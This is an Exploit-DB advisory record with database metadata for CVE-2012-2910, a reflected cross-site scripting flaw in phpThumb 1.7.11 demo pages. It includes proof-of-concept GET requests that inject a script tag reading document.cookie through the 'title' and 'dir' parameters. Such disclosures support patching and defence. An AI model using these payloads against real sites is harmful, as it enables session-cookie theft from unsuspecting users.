SiliSoftware phpThumb 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS
2012-05-16T00:00:00
ID EDB-ID:37206 Type exploitdb Reporter Gjoko Krstic Modified 2012-05-16T00:00:00
Description
SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS. CVE-2012-2910. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/53572/info
phpThumb() is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected.
GET [SOME_CMS]/phpthumb/demo/phpThumb.demo.showpic.php?title="><script>alert(document.cookie);</script> HTTP/1.1
{"id": "EDB-ID:37206", "hash": "ae3cc67dccc3d85fabe5c820dea25e7b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SiliSoftware phpThumb 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS", "description": "SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.showpic.php title Parameter XSS. CVE-2012-2910. Webapps exploit for php platform", "published": "2012-05-16T00:00:00", "modified": "2012-05-16T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/37206/", "reporter": "Gjoko Krstic", "references": [], "cvelist": ["CVE-2012-2910"], "lastseen": "2016-02-04T05:17:42", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2016-02-04T05:17:42"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-2910"]}, {"type": "exploitdb", "idList": ["EDB-ID:37207"]}], "modified": "2016-02-04T05:17:42"}, "vulnersScore": 4.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/37206/", "sourceData": "source: http://www.securityfocus.com/bid/53572/info\r\n\r\nphpThumb() is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.\r\n\r\nphpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. \r\n\r\nGET [SOME_CMS]/phpthumb/demo/phpThumb.demo.showpic.php?title=\"><script>alert(document.cookie);</script> HTTP/1.1 ", "osvdbidlist": ["82295"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in SiliSoftware phpThumb() 1.7.11 allow remote attackers to inject arbitrary web script or HTML via the (1) dir parameter to demo/phpThumb.demo.random.php or (2) title parameter to demo/phpThumb.demo.showpic.php.", "modified": "2017-08-29T01:31:00", "id": "CVE-2012-2910", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2910", "published": "2012-05-21T18:55:00", "title": "CVE-2012-2910", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T05:17:52", "bulletinFamily": "exploit", "description": "SiliSoftware phpThumb() 1.7.11-201108081537 demo/phpThumb.demo.random.php dir Parameter XSS. CVE-2012-2910. Webapps exploit for php platform", "modified": "2012-05-16T00:00:00", "published": "2012-05-16T00:00:00", "id": "EDB-ID:37207", "href": "https://www.exploit-db.com/exploits/37207/", "type": "exploitdb", "title": "SiliSoftware phpThumb 1.7.11-201108081537 demo/phpThumb.demo.random.php dir Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/53572/info\r\n \r\nphpThumb() is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.\r\n \r\nphpThumb() 1.7.11-201108081537 is vulnerable; other versions may also be affected. \r\n\r\nGET [SOME_CMS]/phpthumb/demo/phpThumb.demo.random.php?dir=\"><script>alert(document.cookie);</script> HTTP/1.1 ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37207/"}]}